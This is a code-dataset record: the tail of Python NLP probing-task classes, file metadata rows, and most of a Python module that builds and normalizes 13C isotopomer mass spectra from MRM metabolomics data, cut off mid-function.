        self.test_data_text = _load_one(os.path.join(self.path, "test.csv"))
        all_sentences = []
        for split_data in (self.train_data_text, self.val_data_text, self.test_data_text):
            all_sentences += split_data[0]
        self.sentences = all_sentences
@register_task("se-probing-word-content", rel_path="word_content")
class SEProbingWordContentTask(SingleClassificationTask):
    """Probing task: predict which of 1000 target words the sentence contains."""

    def __init__(self, path, max_seq_len, name, **kw):
        """path: data directory; max_seq_len: token truncation limit."""
        super(SEProbingWordContentTask, self).__init__(name, n_classes=1000, **kw)
        self.path = path
        self.max_seq_len = max_seq_len
        self._label_namespace = self.name + "_tags"
        # BUG FIX: self.labels is read by get_all_labels() and grown in
        # load_data() but was never initialized, raising AttributeError.
        self.labels = []
        # Split caches; populated by load_data().
        self.train_data_text = None
        self.val_data_text = None
        self.test_data_text = None

    def get_all_labels(self):
        # Unique label values observed across all loaded splits.
        return list(set(self.labels))

    def get_sentences(self):
        return self.sentences

    def load_data(self):
        """Load and tokenize the train/val/test CSV splits, collecting labels."""

        def load_csv(data_file):
            rows = pd.read_csv(data_file, encoding="utf-8")
            rows["s1"] = rows["2"].apply(
                lambda x: tokenize_and_truncate(self._tokenizer_name, x, self.max_seq_len)
            )
            # BUG FIX: use extend() rather than append(); append() stored a
            # nested list, which made set(self.labels) in get_all_labels()
            # fail with "unhashable type: 'list'".
            self.labels.extend(rows["1"].tolist())
            return rows["s1"].tolist(), [], rows["1"].tolist(), list(range(len(rows)))

        self.train_data_text = load_csv(os.path.join(self.path, "train.csv"))
        self.val_data_text = load_csv(os.path.join(self.path, "val.csv"))
        self.test_data_text = load_csv(os.path.join(self.path, "test.csv"))
        sentences = []
        for split in ["train", "val", "test"]:
            split_data = getattr(self, "%s_data_text" % split)
            sentences.extend(split_data[0])
        self.sentences = sentences
@register_task("se-probing-tree-depth", rel_path="tree_depth")
class SEProbingTreeDepthTask(SingleClassificationTask):
    """Probing task: predict the depth of the sentence's parse tree (8 bins)."""

    def __init__(self, path, max_seq_len, name, **kw):
        """Keep the data path and token limit; load_data() fills the splits."""
        super(SEProbingTreeDepthTask, self).__init__(name, n_classes=8, **kw)
        self.path = path
        self.max_seq_len = max_seq_len
        self._label_namespace = self.name + "_tags"
        # Per-split caches, filled in by load_data().
        self.train_data_text = None
        self.val_data_text = None
        self.test_data_text = None

    def get_all_labels(self):
        return [str(i) for i in range(8)]

    def get_sentences(self):
        return self.sentences

    def load_data(self):
        """Read the tab-packed "<depth>\\t<sentence>" column from each split."""

        def _load_one(csv_file):
            df = pd.read_csv(csv_file, encoding="utf-8")
            # Raw depths are shifted down by 5 to start the label range at 0.
            depths = df["1"].apply(lambda cell: int(cell.split("\t")[0]) - 5)
            sents = df["1"].apply(lambda cell: cell.split("\t")[1]).apply(
                lambda s: tokenize_and_truncate(self._tokenizer_name, s, self.max_seq_len)
            )
            return sents.tolist(), [], depths.tolist(), list(range(len(df)))

        self.train_data_text = _load_one(os.path.join(self.path, "train.csv"))
        self.val_data_text = _load_one(os.path.join(self.path, "val.csv"))
        self.test_data_text = _load_one(os.path.join(self.path, "test.csv"))
        all_sentences = []
        for split_data in (self.train_data_text, self.val_data_text, self.test_data_text):
            all_sentences += split_data[0]
        self.sentences = all_sentences
@register_task("se-probing-top-constituents", rel_path="top_constituents/")
class SEProbingTopConstituentsTask(SingleClassificationTask):
    """Probing task: predict the sequence of top constituents (20 classes)."""

    def __init__(self, path, max_seq_len, name, **kw):
        """path: data directory; max_seq_len: token truncation limit."""
        super(SEProbingTopConstituentsTask, self).__init__(name, n_classes=20, **kw)
        self.path = path
        self.max_seq_len = max_seq_len
        self._label_namespace = self.name + "_tags"
        # BUG FIX: initialize the label inventory so get_all_labels() cannot
        # raise AttributeError before load_data() has run.
        self.labels = []
        # Split caches; populated by load_data().
        self.train_data_text = None
        self.val_data_text = None
        self.test_data_text = None

    def get_all_labels(self):
        return self.labels

    def process_split(self, split, indexers, model_preprocessing_interface):
        # Single-sentence classification routed through the pair-task helper.
        return process_single_pair_task_split(
            split,
            indexers,
            model_preprocessing_interface,
            label_namespace=self._label_namespace,
            is_pair=False,
            skip_indexing=False,
        )

    def get_sentences(self):
        return self.sentences

    def load_data(self):
        """Load and tokenize the train/val/test CSV splits, collecting labels."""

        def load_csv(data_file):
            rows = pd.read_csv(data_file, encoding="utf-8")
            labels = rows["1"].apply(lambda x: str(x.split("\t")[0]))
            # BUG FIX: accumulate labels across splits instead of overwriting
            # self.labels on every call — previously only the labels of the
            # last-loaded split (test) survived.
            self.labels = sorted(set(self.labels) | set(labels.tolist()))
            s1 = rows["1"].apply(lambda x: x.split("\t")[1])
            s1 = s1.apply(
                lambda x: tokenize_and_truncate(self._tokenizer_name, x, self.max_seq_len)
            )
            return s1.tolist(), [], labels.tolist(), list(range(len(rows)))

        self.train_data_text = load_csv(os.path.join(self.path, "train.csv"))
        self.val_data_text = load_csv(os.path.join(self.path, "val.csv"))
        self.test_data_text = load_csv(os.path.join(self.path, "test.csv"))
        sentences = []
        for split in ["train", "val", "test"]:
            split_data = getattr(self, "%s_data_text" % split)
            sentences.extend(split_data[0])
        self.sentences = sentences
@register_task("se-probing-subj-number", rel_path="subj_number")
class SEProbingSubjNumberTask(SingleClassificationTask):
    """Probing task: predict the grammatical number of the subject noun."""

    def __init__(self, path, max_seq_len, name, **kw):
        """Record data location and truncation limit; data is loaded lazily."""
        super(SEProbingSubjNumberTask, self).__init__(name, n_classes=2, **kw)
        self.path = path
        self.max_seq_len = max_seq_len
        self._label_namespace = self.name + "_tags"
        # Per-split caches, filled in by load_data().
        self.train_data_text = None
        self.val_data_text = None
        self.test_data_text = None

    def get_all_labels(self):
        return ["NN", "NNS"]

    def process_split(self, split, indexers, model_preprocessing_interface):
        # Single-sentence classification routed through the pair-task helper.
        return process_single_pair_task_split(
            split,
            indexers,
            model_preprocessing_interface,
            label_namespace=self._label_namespace,
            is_pair=False,
            skip_indexing=False,
        )

    def get_sentences(self):
        return self.sentences

    def load_data(self):
        """Read the tab-packed "<label>\\t<sentence>" column from each split."""

        def _read_split(csv_path):
            frame = pd.read_csv(csv_path, encoding="utf-8")
            parts = frame["1"].apply(lambda cell: cell.split("\t"))
            label_list = [str(p[0]) for p in parts]
            token_list = [
                tokenize_and_truncate(self._tokenizer_name, p[1], self.max_seq_len)
                for p in parts
            ]
            return token_list, [], label_list, list(range(len(frame)))

        for split_name in ("train", "val", "test"):
            setattr(
                self,
                split_name + "_data_text",
                _read_split(os.path.join(self.path, split_name + ".csv")),
            )
        self.sentences = [
            sent
            for split_name in ("train", "val", "test")
            for sent in getattr(self, split_name + "_data_text")[0]
        ]
@register_task("se-probing-obj-number", rel_path="obj_number")
class SEProbingObjNumberTask(SingleClassificationTask):
    """Probing task: predict the grammatical number of the object noun."""

    def __init__(self, path, max_seq_len, name, **kw):
        """Store the data directory and truncation length; call load_data() later."""
        super(SEProbingObjNumberTask, self).__init__(name, n_classes=2, **kw)
        self.path = path
        self.max_seq_len = max_seq_len
        self._label_namespace = self.name + "_tags"
        # Split caches; populated by load_data().
        self.train_data_text = None
        self.val_data_text = None
        self.test_data_text = None

    def get_all_labels(self):
        return ["NN", "NNS"]

    def process_split(self, split, indexers, model_preprocessing_interface):
        # One sentence per example; labels are indexed through the vocabulary.
        return process_single_pair_task_split(
            split,
            indexers,
            model_preprocessing_interface,
            label_namespace=self._label_namespace,
            is_pair=False,
            skip_indexing=False,
        )

    def get_sentences(self):
        return self.sentences

    def load_data(self):
        """Read and tokenize the tab-packed label/sentence column per split."""

        def _load_one(csv_file):
            df = pd.read_csv(csv_file, encoding="utf-8")
            tags = df["1"].apply(lambda cell: str(cell.split("\t")[0]))
            sents = df["1"].apply(lambda cell: cell.split("\t")[1]).apply(
                lambda s: tokenize_and_truncate(self._tokenizer_name, s, self.max_seq_len)
            )
            return sents.tolist(), [], tags.tolist(), list(range(len(df)))

        self.train_data_text = _load_one(os.path.join(self.path, "train.csv"))
        self.val_data_text = _load_one(os.path.join(self.path, "val.csv"))
        self.test_data_text = _load_one(os.path.join(self.path, "test.csv"))
        all_sentences = []
        for split_data in (self.train_data_text, self.val_data_text, self.test_data_text):
            all_sentences += split_data[0]
        self.sentences = all_sentences
| 35.895669
| 90
| 0.614807
| 2,315
| 18,235
| 4.562851
| 0.070842
| 0.053015
| 0.034081
| 0.042602
| 0.83073
| 0.820695
| 0.820695
| 0.820695
| 0.820695
| 0.820695
| 0
| 0.007742
| 0.256265
| 18,235
| 507
| 91
| 35.966469
| 0.771125
| 0.026049
| 0
| 0.81117
| 0
| 0
| 0.059329
| 0.015017
| 0
| 0
| 0
| 0
| 0
| 1
| 0.151596
| false
| 0
| 0.029255
| 0.071809
| 0.305851
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
f307927fa7c7cd2cabaa9562cafd666cfea4847d
| 206,915
|
py
|
Python
|
sbaas/analysis/analysis_stage01_isotopomer/stage01_isotopomer_execute.py
|
SBRG/sbaas
|
9df76bbffdd620cf8566744a2b0503935998fbe0
|
[
"Apache-2.0"
] | 1
|
2017-05-13T04:35:08.000Z
|
2017-05-13T04:35:08.000Z
|
sbaas/analysis/analysis_stage01_isotopomer/stage01_isotopomer_execute.py
|
SBRG/sbaas
|
9df76bbffdd620cf8566744a2b0503935998fbe0
|
[
"Apache-2.0"
] | null | null | null |
sbaas/analysis/analysis_stage01_isotopomer/stage01_isotopomer_execute.py
|
SBRG/sbaas
|
9df76bbffdd620cf8566744a2b0503935998fbe0
|
[
"Apache-2.0"
] | 2
|
2017-02-23T19:32:38.000Z
|
2020-01-14T19:13:05.000Z
|
'''quantitative metabolomics analysis class'''
from sbaas.analysis.analysis_base import *
from .stage01_isotopomer_query import *
from .stage01_isotopomer_io import *
from sbaas.resources.molmass import Formula
from sbaas.resources.matplot import matplot
import re,copy
from scipy.stats import mode
from scipy.io import savemat
class stage01_isotopomer_execute():
'''class for quantitative metabolomics analysis'''
    def __init__(self, session_I=None):
        """Initialize the isotopomer analysis helper.

        session_I -- optional existing DB session; when omitted a new
                     Session() is created.
        """
        if session_I: self.session = session_I;
        else: self.session = Session();
        # Query helper bound to the same session; numeric helpers.
        self.stage01_isotopomer_query = stage01_isotopomer_query(self.session);
        self.calculate = base_calculate();
        # met_id -> list of validated 13C fragment ion formulas (the trailing
        # '-' marks the charge); presumably used to restrict analyses to
        # fragments validated for isotopomer work — TODO confirm against callers.
        self.isotopomer_13C_fragments_validated = {'23dpg':['C3H7O10P2-'],
                            '6pgc':['C6H12O10P-','C6H10O9P-','C5H12O7P-'],
                            'accoa':['C23H37N7O17P3S-','C23H36N7O14P2S-','C13H23N2O10P2S-','C10H14N5O10P2-','C10H12N5O9P2-','C10H11N5O6P-'],
                            'acon-C':['C6H5O6-','C6H3O5-','C5H5O4-'],
                            'akg':['C5H5O5-','C4H5O3-','C2HO3-'],
                            'amp':['C5H4N5-','C10H13N5O7P-'],
                            'asp-L':['C4H6NO4-','C4H6NO2-','C4H3O4-','C3H6NO2-'],
                            'atp':['C10H15N5O13P3-','C10H14N5O10P2-','C10H12N5O9P2-','C10H11N5O6P-'],
                            'dhap':['C3H6O6P-'],
                            'fad':['C27H32N9O15P2-','C17H18N4O8P-','C10H13N5O7P-'],
                            'fdp':['C6H13O12P2-','C6H10O8P-'],
                            'g1p':['C6H12O9P-'],
                            'g6p':['C6H12O9P-','C4H8O7P-'],
                            'glu-L':['C5H8NO4-','C5H6NO3-'],
                            'glyc3p':['C3H8O6P-'],
                            'glyclt':['CH3O2-','C2H3O3-'],
                            'icit':['C6H7O7-','C6H5O6-','C5H3O3-'],
                            'mal-L':['C4H5O5-','C4H3O4-'],
                            'met-L':['CH3S-','C5H10NO2S-'],
                            'pep':['C3H4O6P-'],
                            'phe-L':['C9H7O2-','C9H10NO2-'],
                            'phpyr':['C9H7O3-','C8H7O','C7H7-'],
                            'Pool_2pg_3pg':['C3H6O7P-'],
                            'prpp':['C5H9O10P2-','C5H12O14P3-'],
                            'pyr':['C3H3O3-'],
                            'ru5p-D':['C5H10O8P-'],
                            's7p':['C7H14O10P-'],
                            'skm':['C7H9O5-','C6H5O-'],
                            'succ':['C4H5O4-','C4H3O3-'],
                            'thr-L':['C4H8NO3-'],
                            'ump':['C9H9N2O6-','C9H12N2O9P-','C4H3N2O2-']};
#analyses not tested:
    def execute_removeDuplicateDilutions(self,experiment_id_I,component_names_dil_I = []):
        '''remove duplicate dilutions from data_stage01_isotopomer_normalized
        NOTE: rows are not removed, but the used value is changed to false
        NOTE: priority is given to the 1x dilution (i.e. 10x dilutions are removed
        if a 1x and 10x are both used'''
        # Input:
        #   experiment_id_I = experiment
        #   component_names_dil_I = component names for which the dilution will be prioritized
        #       (for these components the HIGHEST dilution is kept; for all
        #       others the LOWEST dilution is kept)
        print('execute_removeDuplicateDilutions...')
        # get sample names
        sample_ids = [];
        sample_ids = self.stage01_isotopomer_query.get_sampleIDs_experimentID_dataStage01Normalized(experiment_id_I);
        for si in sample_ids:
            # get component names
            component_names = [];
            component_names = self.stage01_isotopomer_query.get_componentsNames_experimentIDAndSampleID_dataStage01Normalized(experiment_id_I,si);
            for cn in component_names:
                # get dilutions
                sample_dilutions = [];
                sample_dilutions = self.stage01_isotopomer_query.get_sampleDilutions_experimentIDAndSampleIDAndComponentName_dataStage01Normalized(experiment_id_I,si,cn);
                # nothing to de-duplicate when only one dilution was measured
                if len(sample_dilutions)<2: continue;
                # find the minimum and maximum dilution
                min_sample_dilution = min(sample_dilutions);
                max_sample_dilution = max(sample_dilutions);
                for sd in sample_dilutions:
                    # prioritize undiluted samples if not in the dilution list
                    # i.e. diluted samples used_ are set to FALSE
                    if not(cn in component_names_dil_I) and not(sd == min_sample_dilution):
                        # get the sample name
                        sample_name = self.stage01_isotopomer_query.get_sampleName_experimentIDAndSampleIDAndSampleDilution_dataStage01Normalized(experiment_id_I,si,sd);
                        try:
                            # flag (do not delete) the losing dilution's rows
                            data_update = self.session.query(data_stage01_isotopomer_normalized).filter(
                                data_stage01_isotopomer_normalized.experiment_id.like(experiment_id_I),
                                data_stage01_isotopomer_normalized.sample_name.like(sample_name),
                                data_stage01_isotopomer_normalized.component_name.like(cn)).update(
                                {'used_': False},synchronize_session=False);
                        except SQLAlchemyError as e:
                            print(e);
                    # prioritize diluted samples if in the dilution list
                    # i.e. undiluted samples used_ are set to FALSE
                    if (cn in component_names_dil_I) and not(sd == max_sample_dilution):
                        # get the sample name
                        sample_name = self.stage01_isotopomer_query.get_sampleName_experimentIDAndSampleIDAndSampleDilution_dataStage01Normalized(experiment_id_I,si,sd);
                        try:
                            data_update = self.session.query(data_stage01_isotopomer_normalized).filter(
                                data_stage01_isotopomer_normalized.experiment_id.like(experiment_id_I),
                                data_stage01_isotopomer_normalized.sample_name.like(sample_name),
                                data_stage01_isotopomer_normalized.component_name.like(cn)).update(
                                {'used_': False},synchronize_session=False);
                        except SQLAlchemyError as e:
                            print(e);
        # single commit after all updates
        self.session.commit();
    def execute_removeDuplicateComponents(self,experiment_id_I):
        '''remove duplicate components from data_stage01_isotopomer_normalized
        NOTE: rows are not removed, but the used value is changed to false
        NOTE: priority is given to the primary transition'''
        # NOTE(review): stub — listed under "analyses not tested"; the method
        # currently does nothing.
        return
#analyses tested:
    def execute_buildSpectrumFromMRMs(self,experiment_id_I,ms_methodtype_I='isotopomer_13C',sample_name_abbreviations_I=[],sample_names_I=[],met_ids_I=[]):
        '''Extract peak spectrum for each fragment from MRMs'''
        # NOTE(review): mutable default arguments ([]) are shared across calls;
        # they are only read here, but callers should not rely on mutating them.
        # Input:
        #   experiment_id
        #   sample_names = (optional) list of specific samples
        # Output:
        #   sample_name
        #   sample_id
        #   component_group_name
        #   component_name
        #   calculated_concentration
        #   calculated_concentration_units
        #   used_
        # assumptions:
        #   1. there is only spectrum of MRMs for each components
        print('build_precursorSpectrumFromMRMs...')
        # get time points
        time_points = self.stage01_isotopomer_query.get_timePoint_experimentID(experiment_id_I);
        for tp in time_points:
            print('Building precursor and product spectrum from MRMs for time-point ' + str(tp));
            # get dilutions
            dilutions = self.stage01_isotopomer_query.get_sampleDilution_experimentIDAndTimePoint(experiment_id_I,tp);
            for dil in dilutions:
                print('Building precursor and product spectrum from MRMs for dilution ' + str(dil));
                # resolve sample name abbreviations from, in priority order:
                # explicit sample names, explicit abbreviations, or the DB.
                if sample_names_I:
                    sample_abbreviations = [];
                    for sn in sample_names_I:
                        sample_abbreviations_tmp = [];
                        sample_abbreviations_tmp = self.stage01_isotopomer_query.get_sampleNameAbbreviations_experimentIDAndSampleName(experiment_id_I,sn);
                        sample_abbreviations.extend(sample_abbreviations_tmp);
                elif sample_name_abbreviations_I:
                    sample_abbreviations = sample_name_abbreviations_I;
                else:
                    # get sample names and sample name short
                    sample_abbreviations = [];
                    sample_types = ['Unknown','QC'];
                    for st in sample_types:
                        sample_abbreviations_tmp = [];
                        sample_abbreviations_tmp = self.stage01_isotopomer_query.get_sampleNameAbbreviations_experimentIDAndSampleTypeAndTimePointAndDilution(experiment_id_I,st,tp,dil);
                        sample_abbreviations.extend(sample_abbreviations_tmp);
                for sna_cnt,sna in enumerate(sample_abbreviations):
                    print('Building precursor and product spectrum from MRMs for sample name abbreviation ' + sna);
                    ##BUG alert:
                    ##there is a potential bug whereby if the entire spectra per compound is not returned
                    ##e.g. one of the samples is not returned because "used_" is set to false in isotopomer_MQResultsTable
                    ##the spectra could potentially be shifted
                    ##get_componentsNamesAndOther_experimentIDAndSampleNameAndMSMethodTypeAndTimePointAndDilution has been adjusted to
                    ##return all component_names even if the sample from which it came is not "used_" as a temporary fix
                    ##this works for C12 validation experiments, but
                    ##the results of normalization will need to be monitored until a more robust method is established
                    ##UPDATE to BUG:
                    ##'met_cnt_max = len(component_names)-1' changed to 'met_cnt_max = len(component_names)' and
                    ##get_sampleNamesAndReplicateNumbersAndSampleTypes_experimentIDAndSampleNameAbbreviationAndSampleDescriptionAndTimePointAndDilution added
                    ##so that the last component is included in the met/fragment spectra even when not all component names have "used_"
                    ##set to true in isotopomer_MQResultsTable
                    # component names, group names, fragment formula, and fragment mass
                    if met_ids_I:
                        component_names,component_group_names,\
                            precursor_formulas_O, precursor_masses_O,\
                            product_formulas_O, product_masses_O = [],[],[],[],[],[];
                        for met in met_ids_I:
                            component_names_tmp,component_group_names_tmp,\
                                precursor_formulas_tmp, precursor_masses_tmp,\
                                product_formulas_tmp, product_masses_tmp = [],[],[],[],[],[];
                            component_names_tmp,component_group_names_tmp,\
                                precursor_formulas_tmp, precursor_masses_tmp,\
                                product_formulas_tmp, product_masses_tmp = \
                                self.stage01_isotopomer_query.get_componentsNamesAndOther_experimentIDAndSampleNameAndMSMethodTypeAndTimePointAndDilutionAndMetID( \
                                experiment_id_I,sna,ms_methodtype_I,tp,dil,met);
                            if not(component_names_tmp): continue #no component information was found
                            component_names.extend(component_names_tmp)
                            component_group_names.extend(component_group_names_tmp)
                            precursor_formulas_O.extend(precursor_formulas_tmp)
                            precursor_masses_O.extend(precursor_masses_tmp)
                            product_formulas_O.extend(product_formulas_tmp)
                            product_masses_O.extend(product_masses_tmp)
                    else:
                        component_names,component_group_names,\
                            precursor_formulas_O, precursor_masses_O,\
                            product_formulas_O, product_masses_O = [],[],[],[],[],[];
                        component_names,component_group_names,\
                            precursor_formulas_O, precursor_masses_O,\
                            product_formulas_O, product_masses_O = \
                            self.stage01_isotopomer_query.get_componentsNamesAndOther_experimentIDAndSampleNameAndMSMethodTypeAndTimePointAndDilution( \
                            experiment_id_I,sna,ms_methodtype_I,tp,dil);
                        if not(component_names): continue #no component information was found
                    # extract unique met ids and precursor formula id
                    met_ids_unique = [];
                    met_ids = [];
                    #precursor_formulas_unique = [];
                    #product_formulas_unique = [];
                    met_id = '';
                    met_id_old = '';
                    # algorithm works because lists are ordered by component_names
                    for i,cn in enumerate(component_names):
                        met_id = cn.split('.')[0];
                        met_ids.append(met_id);
                        if met_id != met_id_old:
                            met_id_old = met_id;
                            met_ids_unique.append(met_id);
                            #precursor_formulas_unique.append(precursor_formulas_O[i]);
                            #product_formulas_unique.append(product_formulas_O[i]);
                    # get precursor and productformulas for each unique met id:
                    precursor_formulas_unique = [];
                    product_formulas_unique = [];
                    for met in met_ids_unique:
                        precursor_formula,product_formula = None,None;
                        precursor_formula,product_formula = self.stage01_isotopomer_query.get_precursorFormulaAndProductFormula_metID(met,'-','isotopomer_13C')
                        precursor_formulas_unique.append(precursor_formula);
                        product_formulas_unique.append(product_formula);
                    # build precursor and spectrum for each met
                    met_all_cnt = 0;
                    met_cnt_max = len(component_names); # for use in a while loop
                    for i,met in enumerate(met_ids_unique):
                        print('Building precursor and product spectrum from MRMs for metabolite ' + met);
                        # get filtrate samples
                        precursorFiltrate_measured = {};
                        productFiltrate_measured = {};
                        #precursorFiltrate_measured[precursor_formulas_unique[i]] = None; #keep track of all met_ids
                        precursorFiltrate = {};
                        productFiltrate = {};
                        met_cnt = met_all_cnt;
                        # iterate through mets/fragments then sample names in order to calculate the average for each component_name (fragment/mass)
                        while met_cnt < met_cnt_max and met==met_ids[met_cnt]:
                            # get filtrate sample names
                            sample_names = [];
                            replicate_numbers = [];
                            sample_description = 'Filtrate';
                            sample_names,replicate_numbers,sample_types = self.stage01_isotopomer_query.get_sampleNamesAndReplicateNumbersAndSampleTypes_experimentIDAndSampleNameAbbreviationAndSampleDescriptionAndComponentNameAndTimePointAndDilution(experiment_id_I,sna,sample_description,component_names[met_cnt],tp,dil);
                            intensities = [];
                            for sn_cnt,sn in enumerate(sample_names):
                                # get intensities
                                intensity = None;
                                intensity = self.stage01_isotopomer_query.get_peakHeight_sampleNameAndComponentName(sn,component_names[met_cnt]);
                                if not(intensity): continue
                                intensities.append(intensity);
                            n_replicates = len(intensities);
                            intensities_average_filtrate = 0.0;
                            intensities_var_filtrate = 0.0;
                            # calculate average and CV of the intensities
                            if (not(intensities)): intensities_average_filtrate = 0.0;
                            elif n_replicates<2: intensities_average_filtrate = intensities[0];
                            else:
                                #intensities_average_filtrate, intensities_var_filtrate = self.calculate.calculate_ave_var_R(intensities);
                                intensities_average_filtrate = numpy.mean(numpy.array(intensities));
                                intensities_var_filtrate = numpy.var(numpy.array(intensities));
                            # append value to dictionary, keyed on the
                            # (precursor mass, product mass) transition pair
                            precursorFiltrate[(precursor_masses_O[met_cnt],product_masses_O[met_cnt])] = intensities_average_filtrate;
                            productFiltrate[(precursor_masses_O[met_cnt],product_masses_O[met_cnt])] = intensities_average_filtrate;
                            met_cnt += 1;
                        precursorFiltrate_measured[precursor_formulas_unique[i]] = precursorFiltrate
                        productFiltrate_measured[product_formulas_unique[i]] = productFiltrate
                        # get broth samples
                        sample_names = [];
                        sample_description = 'Broth';
                        sample_names,replicate_numbers,sample_types = self.stage01_isotopomer_query.get_sampleNamesAndReplicateNumbersAndSampleTypes_experimentIDAndSampleNameAbbreviationAndSampleDescriptionAndTimePointAndDilution(experiment_id_I,sna,sample_description,tp,dil);
                        #sample_names,replicate_numbers,sample_types = self.stage01_isotopomer_query.get_sampleNamesAndReplicateNumbersAndSampleTypes_experimentIDAndSampleNameAbbreviationAndSampleDescriptionAndComponentNameAndTimePointAndDilution(experiment_id_I,sna,sample_description,component_names[met_cnt],tp,dil);
                        # iterate through sample names then mets/fragments in order to calculate the spectrum for each sample and component
                        for sn_cnt,sn in enumerate(sample_names):
                            print('Building precursor and product spectrum from MRMs for sample ' + sn);
                            precursorPeakSpectrum_measured = {};
                            precursorPeakSpectrum_corrected = {};
                            productPeakSpectrum_measured = {};
                            productPeakSpectrum_corrected = {};
                            #precursorPeakSpectrum_measured[precursor_formulas_unique[i]] = None; #keep track of all met_ids
                            #precursorPeakSpectrum_corrected[precursor_formulas_unique[i]] = None; #keep track of all met_ids
                            precursorMeasured = {};
                            precursorCorrected = {};
                            productMeasured = {};
                            productCorrected = {};
                            # restart the fragment counter at this met's first component
                            met_cnt = met_all_cnt;
                            while met_cnt < met_cnt_max and met==met_ids[met_cnt]:
                                # get intensities
                                intensity = None;
                                intensity = self.stage01_isotopomer_query.get_peakHeight_sampleNameAndComponentName(sn,component_names[met_cnt]);
                                if not(intensity):
                                    # missing peak: record an explicit zero so the spectrum keeps its shape
                                    precursorMeasured[(precursor_masses_O[met_cnt],product_masses_O[met_cnt])] = 0.0;
                                    productMeasured[(precursor_masses_O[met_cnt],product_masses_O[met_cnt])] = 0.0;
                                else:
                                    precursorMeasured[(precursor_masses_O[met_cnt],product_masses_O[met_cnt])] = intensity;
                                    productMeasured[(precursor_masses_O[met_cnt],product_masses_O[met_cnt])] = intensity;
                                    #if precursorFiltrate_measured[precursor_formulas_unique[i]][(precursor_masses_O[met_cnt],product_masses_O[met_cnt])] < 0.5*intensity:
                                    #    corrected_intensity = intensity - precursorFiltrate_measured[precursor_formulas_unique[i]][(precursor_masses_O[met_cnt],product_masses_O[met_cnt])];
                                    #else: corrected_intensity = 0.0;
                                    #precursorCorrected[(precursor_masses_O[met_cnt],product_masses_O[met_cnt])] = corrected_intensity;
                                met_cnt += 1;
                            precursorPeakSpectrum_measured[precursor_formulas_unique[i]] = precursorMeasured;
                            productPeakSpectrum_measured[product_formulas_unique[i]] = productMeasured;
                            # generate normalized spectrum for the precursor:
                            precursorPeakSpectrum_measured, precursorPeakSpectrum_corrected, precursorPeakSpectrum_normalized \
                                = self.build_precursorSpectrumFromMRMs(precursorPeakSpectrum_measured,precursorFiltrate_measured);
                            peakSpectrum_stats_O,precursorPeakSpectrum_theoretical = self.compare_peakSpectrum_normMax([precursorPeakSpectrum_normalized],True);
                            # update data_stage01_isotopomer_normalized
                            if precursorPeakSpectrum_theoretical[precursor_formulas_unique[i]]:
                                for k,v in precursorPeakSpectrum_theoretical[precursor_formulas_unique[i]].items():
                                    row1 = None;
                                    row1 = data_stage01_isotopomer_normalized(experiment_id_I,sn,sna,sample_types[sn_cnt],tp,dil,replicate_numbers[sn_cnt],
                                            met,precursor_formulas_unique[i],int(numpy.round(k)),
                                            precursorPeakSpectrum_measured[precursor_formulas_unique[i]][k],'cps',
                                            precursorPeakSpectrum_corrected[precursor_formulas_unique[i]][k],'cps',
                                            precursorPeakSpectrum_normalized[precursor_formulas_unique[i]][k],'normMax',
                                            v,peakSpectrum_stats_O[precursor_formulas_unique[i]][k]['absDev'],'MRM',True,None);
                                    self.session.add(row1);
                            # generate normalized spectrum for the product:
                            productPeakSpectrum_measured, productPeakSpectrum_corrected, productPeakSpectrum_normalized \
                                = self.build_productSpectrumFromMRMs(productPeakSpectrum_measured,productFiltrate_measured);
                            peakSpectrum_stats_O,productPeakSpectrum_theoretical = self.compare_peakSpectrum_normMax([productPeakSpectrum_normalized],True);
                            # update data_stage01_isotopomer_normalized
                            if productPeakSpectrum_theoretical[product_formulas_unique[i]]:
                                for k,v in productPeakSpectrum_theoretical[product_formulas_unique[i]].items():
                                    row2 = None;
                                    row2 = data_stage01_isotopomer_normalized(experiment_id_I,sn,sna,sample_types[sn_cnt],tp,dil,replicate_numbers[sn_cnt],
                                            met,product_formulas_unique[i],int(numpy.round(k)),
                                            productPeakSpectrum_measured[product_formulas_unique[i]][k],'cps',
                                            productPeakSpectrum_corrected[product_formulas_unique[i]][k],'cps',
                                            productPeakSpectrum_normalized[product_formulas_unique[i]][k],'normMax',
                                            v,peakSpectrum_stats_O[product_formulas_unique[i]][k]['absDev'],'MRM',True,None);
                                    self.session.add(row2);
                        # advance the running component counter past this met's fragments
                        met_all_cnt = met_cnt
        # single commit after all rows have been added
        self.session.commit();
    def execute_updateNormalizedSpectrum(self,experiment_id_I, sample_names_I = None, sample_name_abbreviations_I = None, met_ids_I = None, scan_types_I = None):
        '''Re-calculate intensity_normalized from intensity_corrected and the used flag.

        Walks time-point -> dilution -> sample name abbreviation -> scan type -> met ->
        sample name, re-extracts the normalized spectrum for each fragment, compares it
        to the theoretical spectrum, and bulk-updates data_stage01_isotopomer_normalized
        once per time-point.

        Args:
            experiment_id_I: id of the experiment to process
            sample_names_I: optional list of sample names to restrict to
            sample_name_abbreviations_I: optional list of sample name abbreviations
            met_ids_I: optional list of metabolite ids
            scan_types_I: optional list of scan types
        '''
        print('execute_updateNormalizedSpectrum...')
        # get time points
        time_points = self.stage01_isotopomer_query.get_timePoint_experimentID_dataStage01Normalized(experiment_id_I);
        for tp in time_points:
            print('Building precursor and product spectrum from isotopomer normalized for time-point ' + str(tp));
            # rows to bulk-update for this time-point
            dataListUpdated = [];
            # get dilutions
            dilutions = [];
            dilutions = self.stage01_isotopomer_query.get_sampleDilution_experimentIDAndTimePoint_dataStage01Normalized(experiment_id_I,tp);
            for dil in dilutions:
                print('Building precursor and product spectrum from isotopomer normalized for dilution ' + str(dil));
                # resolve the sample name abbreviations to process
                if sample_names_I:
                    sample_abbreviations = [];
                    sample_types = ['Unknown','QC'];
                    for sn in sample_names_I:
                        for st in sample_types:
                            sample_abbreviations_tmp = [];
                            sample_abbreviations_tmp = self.stage01_isotopomer_query.get_sampleNameAbbreviations_experimentIDAndSampleTypeAndTimePointAndDilutionAndSampleName_dataStage01Normalized(experiment_id_I,st,tp,dil,sn);
                            sample_abbreviations.extend(sample_abbreviations_tmp);
                elif sample_name_abbreviations_I:
                    sample_abbreviations = sample_name_abbreviations_I;
                else:
                    # get sample names and sample name abbreviations
                    sample_abbreviations = [];
                    sample_types = ['Unknown','QC'];
                    for st in sample_types:
                        sample_abbreviations_tmp = [];
